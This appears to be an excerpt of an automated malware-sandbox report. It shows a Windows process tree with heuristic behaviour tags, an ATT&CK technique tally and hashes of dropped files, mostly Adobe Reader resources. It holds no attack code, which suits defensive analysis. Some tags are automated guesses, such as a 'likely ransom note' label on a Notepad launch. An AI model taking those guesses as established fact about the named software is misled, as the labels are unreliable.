                                    "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UnblockGroup.mpeg"
                                    1⤵
                                    • Suspicious behavior: AddClipboardFormatListener
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    • Suspicious use of SetWindowsHookEx
                                    PID:480
                                  • C:\Windows\system32\NOTEPAD.EXE
                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UninstallSave.ps1xml
                                    1⤵
                                    • Opens file in notepad (likely ransom note)
                                    PID:4572
                                  • C:\Windows\system32\msiexec.exe
                                    C:\Windows\system32\msiexec.exe /V
                                    1⤵
                                    • Sets file execution options in registry
                                    • Enumerates connected drives
                                    • Drops file in System32 directory
                                    • Drops file in Program Files directory
                                    • Drops file in Windows directory
                                    • Modifies Internet Explorer settings
                                    • Modifies data under HKEY_USERS
                                    • Modifies registry class
                                    PID:1356
                                    • C:\Windows\syswow64\MsiExec.exe
                                      C:\Windows\syswow64\MsiExec.exe -Embedding 4D5912AEF0BEE17C068738112C8D0D1A
                                      2⤵
                                      • Loads dropped DLL
                                      PID:4944
                                    • C:\Windows\syswow64\MsiExec.exe
                                      C:\Windows\syswow64\MsiExec.exe -Embedding 0CACDFA1BFDCE3A6516A53C0B23256D9 E Global\MSI0000
                                      2⤵
                                      • Sets file execution options in registry
                                      • Loads dropped DLL
                                      • Registers COM server for autorun
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      PID:5348
                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe" 19.010.20069 19.010.20069.0
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      PID:2164
                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    • Modifies Internet Explorer settings
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2320
                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5436
                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=088B5DD25CEE1E08E16024352AA2F9E5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3068
                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B0539E22F58741F83D1C4F15DE677D39 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B0539E22F58741F83D1C4F15DE677D39 --renderer-client-id=2 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job /prefetch:1
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:5964
                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A546A07051CFAC09C5B438F22FEBCB95 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3912
                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=562B0D18C7314A0D42AF290401B868AB --mojo-platform-channel-handle=1948 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                        3⤵
                                        • Executes dropped EXE
                                        PID:744
                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=353678BF651C2637CC05A27AFCFEB577 --mojo-platform-channel-handle=2452 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                        3⤵
                                        • Executes dropped EXE
                                        PID:5740
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:2504
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                      1⤵
                                        PID:5676
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                          2⤵
                                          • Checks processor information in registry
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          • Suspicious use of SetWindowsHookEx
                                          PID:5840
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.0.501419435\519806322" -parentBuildID 20230214051806 -prefsHandle 1752 -prefMapHandle 1744 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {142513f3-bd6b-4ff1-b61c-7310a9f979e8} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 1832 26766924458 gpu
                                            3⤵
                                              PID:4140
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.1.1019394367\437426329" -parentBuildID 20230214051806 -prefsHandle 2344 -prefMapHandle 2340 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1ce38bc-76bf-428f-a14e-f667f95d0655} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 2356 26759c88d58 socket
                                              3⤵
                                              • Checks processor information in registry
                                              PID:5796
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.2.970634700\618294786" -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 2920 -prefsLen 22252 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bb76479-fc77-4a6b-aa3a-f885df0cd519} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 2860 26769809558 tab
                                              3⤵
                                                PID:2420
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.3.997608659\1959745580" -childID 2 -isForBrowser -prefsHandle 3804 -prefMapHandle 3800 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bc4415f-ac9d-4433-8fa5-3e2a9c074348} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 3816 2676bef1158 tab
                                                3⤵
                                                  PID:4468
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.4.1248705250\212141891" -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5240 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbc22f22-5a9f-4ada-ac4f-28878ddc9251} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 4612 267681cd358 tab
                                                  3⤵
                                                    PID:5800
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.5.54016287\1437624456" -childID 4 -isForBrowser -prefsHandle 4880 -prefMapHandle 4700 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ead7cd48-d18a-408b-9d2a-e68a870bf625} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 5428 2676cec8c58 tab
                                                    3⤵
                                                      PID:3960
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.6.1354947477\743920846" -childID 5 -isForBrowser -prefsHandle 5420 -prefMapHandle 4868 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c157d164-7903-4de6-8c90-f8eaa8f1e285} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 5592 2676d73e558 tab
                                                      3⤵
                                                        PID:5412
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.7.369834930\2807757" -childID 6 -isForBrowser -prefsHandle 5056 -prefMapHandle 2572 -prefsLen 27731 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28533c7e-bb4c-46f3-8fa6-dce878997c78} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 4988 2676e8f2058 tab
                                                        3⤵
                                                          PID:4696
                                                    • C:\Windows\system32\LogonUI.exe
                                                      "LogonUI.exe" /flags:0x4 /state0:0xa39be055 /state1:0x41c64e6d
                                                      1⤵
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2964

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                    Initial Access

                                                    Execution

                                                    Command and Scripting Interpreter

                                                    1
                                                    T1059

                                                    PowerShell

                                                    1
                                                    T1059.001

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Persistence

                                                    Boot or Logon Autostart Execution

                                                    5
                                                    T1547

                                                    Registry Run Keys / Startup Folder

                                                    3
                                                    T1547.001

                                                    Winlogon Helper DLL

                                                    2
                                                    T1547.004

                                                    Pre-OS Boot

                                                    1
                                                    T1542

                                                    Bootkit

                                                    1
                                                    T1542.003

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Privilege Escalation

                                                    Boot or Logon Autostart Execution

                                                    5
                                                    T1547

                                                    Registry Run Keys / Startup Folder

                                                    3
                                                    T1547.001

                                                    Winlogon Helper DLL

                                                    2
                                                    T1547.004

                                                    Abuse Elevation Control Mechanism

                                                    1
                                                    T1548

                                                    Bypass User Account Control

                                                    1
                                                    T1548.002

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Defense Evasion

                                                    Modify Registry

                                                    11
                                                    T1112

                                                    Hide Artifacts

                                                    2
                                                    T1564

                                                    Hidden Files and Directories

                                                    2
                                                    T1564.001

                                                    Abuse Elevation Control Mechanism

                                                    1
                                                    T1548

                                                    Bypass User Account Control

                                                    1
                                                    T1548.002

                                                    Impair Defenses

                                                    3
                                                    T1562

                                                    Disable or Modify Tools

                                                    3
                                                    T1562.001

                                                    File and Directory Permissions Modification

                                                    1
                                                    T1222

                                                    Pre-OS Boot

                                                    1
                                                    T1542

                                                    Bootkit

                                                    1
                                                    T1542.003

                                                    Credential Access

                                                    Unsecured Credentials

                                                    1
                                                    T1552

                                                    Credentials In Files

                                                    1
                                                    T1552.001

                                                    Discovery

                                                    System Information Discovery

                                                    6
                                                    T1082

                                                    Query Registry

                                                    5
                                                    T1012

                                                    Peripheral Device Discovery

                                                    2
                                                    T1120

                                                    Lateral Movement

                                                    Collection

                                                    Data from Local System

                                                    1
                                                    T1005

                                                    Exfiltration

                                                    Command and Control

                                                    Impact

                                                    Resource Development

                                                    Reconnaissance

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Config.Msi\e5cdd02.rbs
                                                      Filesize

                                                      682KB

                                                      MD5

                                                      e463bb3e952e8648244a952a34edec4d

                                                      SHA1

                                                      4deb602eeef29edf26ef57ec7fea82fcec955ea7

                                                      SHA256

                                                      c9916405e005081ed9d86efbb7276205ef83e30f3b2c11163f7382022a2d561c

                                                      SHA512

                                                      1362cfd534f44474bf145662925931b50d4dc4b4190b57361cc0eb618230f17a6e536d0956809905be7476a9eed06283e6edd4049de30f874d62ea0f95e3d507

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\s_remove_18.svg
                                                      Filesize

                                                      711B

                                                      MD5

                                                      8bb62cfad37334a15129a0da2091d472

                                                      SHA1

                                                      a9f223eb2bd355c8cbf7d17db501db834f39cb6c

                                                      SHA256

                                                      94f76b160568e3705f1e0d2d6ff3ee6927bd812032498d373bbcc516af2864f7

                                                      SHA512

                                                      da08c15accffeca9c1ec985899ebf234aa881546dfb80862c72bfe206dfbf92772582ff87c0636ca0a4cdeeb03635de7a24aecacba86e22683a1d689724d6dab

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon.png
                                                      Filesize

                                                      445B

                                                      MD5

                                                      ed537606a39879a091a8c085cf95ff38

                                                      SHA1

                                                      86c73d85094efbfdcd80abf119f03b64a71cbd0f

                                                      SHA256

                                                      42c312aa2a038ca54e9a6fe4bad8c9c044c35b4c5f421496f289c00c957d7591

                                                      SHA512

                                                      fc331c2e1ec84a6a83b51f365484033b3069d73c5987094cf526c45a92c3297df22fe2a35ec20382ed4d563ee604ecbdbdf17fb735f7e0118ab444b4d5db8e9d

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon_2x.png
                                                      Filesize

                                                      611B

                                                      MD5

                                                      37d179c947c13f64b7b6356f57441032

                                                      SHA1

                                                      9d1c1bd0c370336c229baeb2cd7f80d7b3cf4d0a

                                                      SHA256

                                                      71039e6370f68913e67cb8451d3127c22d3e1045ca644e4dc9821e9f6f6899aa

                                                      SHA512

                                                      3034a8b9694bbde20be0f7fa2596fbca8fd3f1e45810b15a5cb1a2bc6f4ef852afc36639a56f82a4e582d74684724d5c4ee43cbf5e33c94c6cf00b3c059757bf

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon_hover.png
                                                      Filesize

                                                      388B

                                                      MD5

                                                      6d8f7e9751f955452a9ceeb815456035

                                                      SHA1

                                                      e6903b2ec0f2c5632d4288f88d993d4a41f04527

                                                      SHA256

                                                      8bcf53efcb1b630087d4cfcedf5e48a7abaa9c71dd13745eedfd2c7cfa6827f5

                                                      SHA512

                                                      c869a94a224bce8ed553f5a86ffdea6d8a279e06a1c060b311cc52e4538b89e07fc0a4a76f85a28e2f62e8629a7c67101e990cc12bef2d0e2d6d7d3c1d4d7d90

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png
                                                      Filesize

                                                      552B

                                                      MD5

                                                      f364ee8508831e375004ac82b924efd5

                                                      SHA1

                                                      b04bc510ef53760bdd22ce0dd9d2e2f248c16df7

                                                      SHA256

                                                      87da831caa04bd303918a32265830ff97648dc8adc18881ba14d1cc1d28cde85

                                                      SHA512

                                                      399b2da615c0373214e3cf421f502fd0de02bdb9473da644e9f23df9ea7fc792da7d36bde61a456c2451276f74877232c8bedbe55e57098c1ffd13719206bac3

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png
                                                      Filesize

                                                      388B

                                                      MD5

                                                      39be6b8bd8dce3ff5a1c20ac41ba993f

                                                      SHA1

                                                      a49d8a0c769601bf922c8aa1673bfd3a92d67855

                                                      SHA256

                                                      854a09f1f875a3a2e6566c593af465c9c8a3aa9b9112eb755bb09cee76224a63

                                                      SHA512

                                                      9fd5d4f02aa9d24ce9591ac0542d0abadf2b26208c3043220d2a0f036298199131ad804f9be20c6cc67f39e2921eebec65efb3a1e435ee7318fd8591fcc2fa2a

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_2x.png
                                                      Filesize

                                                      552B

                                                      MD5

                                                      b34c8c3b8117b038839beefa0df5a7ce

                                                      SHA1

                                                      c8d1e8eb4c71d5aa02e36fe3b7365374a9e4e32b

                                                      SHA256

                                                      bfef65c62bfc309f698e8e0b999edfc06ad272b87d805f183551c43f08d704a9

                                                      SHA512

                                                      89fa9f31f62c6e119e6280dbc475c35dd7bb37c27457732a0b1cb04809a35fec44a12ccb6a3a626586d596a0636d754a9ff79ecd9ed739c5c6edea50738a60d7

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png
                                                      Filesize

                                                      388B

                                                      MD5

                                                      2ca9f57d61ed45337ec4e6565480367f

                                                      SHA1

                                                      fa06ed14d72ad8ced6ad98a4e223bc80cccc5e75

                                                      SHA256

                                                      a584379ebf9aa0d3c0239edb7e1f114f01a9865f01c68494d5f28d410ba8d873

                                                      SHA512

                                                      83a172f2f304b2f634c313e248b62c11b7798f416872929ef233134bfc4ad8f44b1b4dfa123e8378a233417e1298a73088258f5671ace96ff677d1f26447de87

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover_2x.png
                                                      Filesize

                                                      552B

                                                      MD5

                                                      74af10749d7f19d15c8dca65a7453415

                                                      SHA1

                                                      dc96d9dbffe472600548dc64c724055e62620d8d

                                                      SHA256

                                                      0e0084df79ab98e5df48ed1e01987f7ac3fcf4a038dd5453708d868f73a073a8

                                                      SHA512

                                                      83d190bf6f9cb77894e7aaf84029c40a2a0335e43d08062ca2275a2cb7a784a29b3b7b8be820c7dfb2f1458ab0528fcdfe45f05491be673b30495e1ed916999e

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\icons.png
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      d3963e6fe853dbd9d22f794d5ece4c48

                                                      SHA1

                                                      db35a3e565d0b6dca7ad243443a5560a1247eb33

                                                      SHA256

                                                      a870c4e9ff6c433b5583a8f09fcdfbe712241c7e7d64cd59a10c2ad592f64fe5

                                                      SHA512

                                                      fe60a1b2a20d3c11152df2d6fbee05c3d6b80c89486d258dd6d318c3f89deef3e91a116c502c117d79a5020489e394194310f5c7a7ea3d4b7d284ca5a3e43ca7

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      d4585d0ccf35ae69b1246339cfb46b90

                                                      SHA1

                                                      1fffc3492684a5db89e949d2d8b612eabb38994b

                                                      SHA256

                                                      d6707a7a393687bccd92de05cecbd746be791f3a670cb4fc106252f49d2a0a2a

                                                      SHA512

                                                      a85560cabd3ce3dd21177948884a921385c0325b431dd281edda61d3585a69ceef28cb339c5a88d167597451ce22d54828b03d69823b5737bf3e253bd9bda9f6

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\icons_retina.png
                                                      Filesize

                                                      15KB

                                                      MD5

                                                      7045217d47de04c1d72eea7413b780c4

                                                      SHA1

                                                      04c73e38fa17d35a1f684577cc79d77615c09e02

                                                      SHA256

                                                      8c659d0904687a97d9c6b649e4b74e99b286265e92252908824efcd07f956b66

                                                      SHA512

                                                      abe433cb154598ad2c0de6070d6e75bb70274a58ce92007ce200201f788553517bb579b0df5cbde3b4f2bebdca1243f0e54836d125d72ea206b3ccba1d15a385

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\new_icons.png
                                                      Filesize

                                                      8KB

                                                      MD5

                                                      0e366a48bdf6a3b140508e56eed0bf0f

                                                      SHA1

                                                      bcd76a4a537fc00d8c468b9496d3d5b5dd6a2a7e

                                                      SHA256

                                                      a311b5a78e1b856505337b90e53edb4ba380160234e1b4e8801c231ba8d590a5

                                                      SHA512

                                                      1830e3e260a50f79553673bec5775c0ba623284d233c25a2da016f273e67e218f5d2f49bed5f9e68842c7dc14b852e979fbfc7ed336f9a34dafd04a48742f827

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\new_icons_retina.png
                                                      Filesize

                                                      17KB

                                                      MD5

                                                      28a435033f504be69def6f9d52efd2b8

                                                      SHA1

                                                      6f50318e05b79851a445f98d4b3ae3d65feb22ad

                                                      SHA256

                                                      f84c7c93947e86e2a499117d4c55910de9fbaefb6d703a8d0f90f4867c69c182

                                                      SHA512

                                                      a2b410bb6bb328eb1e3af794259bacce7918f44698c8145fa530af9be6bfc22a064c1f0ee5d7ce289f4a60a50fce9b56a720793d19ec477340b1d7ef158df6b0

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\bg_pattern_RHP.png
                                                      Filesize

                                                      179B

                                                      MD5

                                                      117ec36a5cc6d82e63e8b3beae4a3099

                                                      SHA1

                                                      4c692192be53827f8ec8015ceb129f6e0f89e923

                                                      SHA256

                                                      041917c06c638a1b1accaf0d2f0b2a6dd335dea629de602e104553024d822ea4

                                                      SHA512

                                                      abb02a02a9161ece12464020676e880f1eed96b43a9dfd4f7ca06dc203fe633b0a712da5f151d36a5644d65aad7b2880c135df0bc42d7c1e61b44006807a8c9d

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\illustrations_retina.png
                                                      Filesize

                                                      19KB

                                                      MD5

                                                      ff84cb8f89545b86e32abd27a9694e1e

                                                      SHA1

                                                      3cde537531f8689772bc9eb39a12c687da5d5225

                                                      SHA256

                                                      8b32854c17056ea617a680cd26ea91015e77d68260f656758984583eb6895a87

                                                      SHA512

                                                      2690d712ba02fbaa769689d0eae380d0988721c6fcb710e04e1e2aba56496cb58f5d4168fe75540139afce179b1250c2ceb11fc4c3d589a3615ad20dccacc8f1

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png
                                                      Filesize

                                                      703B

                                                      MD5

                                                      ccc8d470e94b3441e41521572ba86ccd

                                                      SHA1

                                                      d294d7e78b596fefcc8084fab7917c54d3043e27

                                                      SHA256

                                                      a7cdf870b0b1b8459e94ed25a29daa87f5e9050294bf6cdff3bc72f93b928f94

                                                      SHA512

                                                      f3b2ca4d3160a089f6959b7c8e3e6c213c0facb2733f7948a7222196d3bd8c7350015602569df2cdc7408e38b0ff6700306d7e3439f0892b4d13d9f2d5329e42

                                                      Download Submit
